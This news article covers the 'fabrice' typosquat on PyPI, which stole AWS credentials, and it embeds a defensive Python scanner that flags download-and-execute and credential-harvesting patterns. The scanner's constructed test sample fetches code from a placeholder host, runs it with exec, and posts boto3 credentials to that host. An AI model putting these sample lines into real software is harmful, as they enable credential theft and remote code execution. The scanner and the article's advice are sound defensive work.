Long-standing Malicious Python Package Lurked Undetected on PyPI for Years


November 10, 2024 by our News Team

A malicious Python package, "fabrice," has been discovered on PyPI, targeting login credentials and secret keys from Amazon Web Services and using clever evasion techniques to avoid detection, highlighting the need for caution and vigilance in the open-source community.

  • The malicious package was cleverly designed to mimic a legitimate package, making it difficult to detect.
  • The package was downloaded roughly 37,000 times, which gives a sense of how many environments the typosquat may have reached.
  • The incident serves as a reminder for developers to exercise caution and adopt best practices to protect their projects from potential threats.


A recent discovery on the Python Package Index (PyPI) has revealed a malicious Python package that had been sitting on the platform since 2021. The package, known as “fabrice,” was designed to steal sensitive data from projects that imported it. Specifically, it harvested AWS access keys and secret keys, putting at risk any developer who mistakenly added the package to a project.

The trick behind the package was its name, a near-match for the legitimate “fabric” library, which is widely used to run shell commands on remote hosts over SSH. While the official fabric package has been downloaded over 200 million times, its fraudulent counterpart accumulated around 37,000 downloads. That count gives a sense of how many environments this typosquatting campaign may have reached.

According to security researchers at Socket, the package went undetected for so long because of its evasion techniques. The early releases contained no malicious content, so there was nothing to flag when they were uploaded. Later versions added code that downloaded and executed malicious scripts, with the aim of stealing developers’ AWS credentials, and because the actual payload was fetched from a remote server at runtime rather than shipped inside the package, inspecting the uploaded files alone revealed little.

To further complicate matters, the package adapted its behavior to the operating system it ran on, with separate code paths for Linux and Windows. In both cases it downloaded a payload from an external server and executed it to collect AWS credentials, then sent the stolen data back to a remote system, where it could be used to attack the victim’s AWS account. This dynamic, platform-dependent behavior made the threat harder to identify and to reproduce in analysis.
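The download-and-execute and credential-harvesting pattern described above can be caught with a simple static heuristic. The following scanner is an added example, not Socket's tooling and not code from the fabrice package: it parses Python source with the standard `ast` module, resolves import aliases, and flags files that combine a remote fetch with dynamic code execution or with AWS credential access. The indicator table, the rules and both sample sources are constructed for illustration; the "suspect" sample only imitates the behavior the article describes and is parsed, never executed.

```python
import ast

# Indicator table (constructed for this example): fully-qualified call name
# -> the behaviour category that call suggests.
INDICATORS = {
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
    "urllib.request.urlopen": "remote fetch",
    "requests.get": "remote fetch",
    "subprocess.Popen": "subprocess spawn",
    "subprocess.run": "subprocess spawn",
    "os.system": "subprocess spawn",
    "platform.system": "OS fingerprinting",
    "boto3.Session": "AWS credential access",
    "boto3.client": "AWS credential access",
}

# Category combinations that look like download-and-execute or credential
# harvesting rather than ordinary library code.
RULES = [
    ({"remote fetch", "dynamic code execution"}, "fetches remote content and executes it"),
    ({"remote fetch", "subprocess spawn"}, "fetches remote content and spawns a process"),
    ({"AWS credential access", "remote fetch"}, "touches AWS credentials and talks to the network"),
]


def _import_aliases(tree):
    """Map each locally bound import name to what it refers to."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:                       # import urllib.request as ur
                    aliases[a.asname] = a.name
                else:                              # import urllib.request -> binds 'urllib'
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                   # from urllib.request import urlopen as uo
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def scan_source(src):
    """Scan one Python source text; return findings, categories and a verdict."""
    tree = ast.parse(src)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        resolved = aliases.get(head, head) + ("." + rest if rest else "")
        category = INDICATORS.get(resolved)
        if category:
            findings.append((node.lineno, resolved, category))
    categories = {c for _, _, c in findings}
    reasons = [why for needed, why in RULES if needed <= categories]
    return {"findings": findings, "categories": categories,
            "reasons": reasons, "flagged": bool(reasons)}


# Constructed sample imitating the behaviour described in the article; it is
# only parsed, never executed, and is not the real fabrice code.
SUSPECT_SRC = '''
import platform
import urllib.request
import boto3

def _setup():
    if platform.system() == "Linux":
        code = urllib.request.urlopen("http://example.invalid/payload").read()
        exec(code)
    creds = boto3.Session().get_credentials()
    urllib.request.urlopen("http://example.invalid/collect", data=str(creds).encode())
'''

# Constructed benign sample: file I/O and JSON parsing only.
BENIGN_SRC = '''
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_SRC), ("benign", BENIGN_SRC)):
        result = scan_source(src)
        print(label, "flagged" if result["flagged"] else "clean", result["reasons"])
        for lineno, call, category in result["findings"]:
            print(f"  line {lineno}: {call} ({category})")
```

Run it over the files of a package unpacked from its wheel or sdist before installing (for example after `pip download`), and treat a hit as a reason to read the code rather than as proof. A heuristic this small does not follow obfuscation such as base64-encoded blobs or attribute names assembled from strings, which is exactly what a payload fetched at runtime is designed to exploit, so it complements rather than replaces behavioural analysis.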

Because the package relied on typos in its name, one crucial protective measure is to check the exact name of every package you install from PyPI against the project you actually intend to use. Typosquatting of popular package names is increasingly common on PyPI. Name checks alone are not enough, though: fabrice started out benign and only turned malicious in later releases, so pin dependencies to specific versions with hashes and review what changes when a dependency is updated.

This recent incident serves as a reminder of the ongoing challenges faced by the open-source community in maintaining the security and integrity of software libraries. While PyPI continues to take steps to enhance its security measures, it is crucial for developers to exercise caution and adopt best practices to protect their projects from potential threats.

As the Python ecosystem continues to thrive and attract more developers, it is essential for the community to work together to ensure the safety of the tools and packages we rely on. By staying informed, remaining vigilant, and actively contributing to the security of the ecosystem, we can collectively mitigate the risks posed by malicious actors and safeguard the integrity of our projects.



Technology Explained


AWS: Amazon Web Services (AWS) is Amazon’s cloud platform, offering on-demand, pay-as-you-go computing services such as virtual servers, storage, databases, analytics, monitoring, and distributed computing. Companies use it to build web and mobile applications, run large-scale analytics, provision infrastructure quickly, and design storage architectures, and many large organizations rely on it for their computing needs.
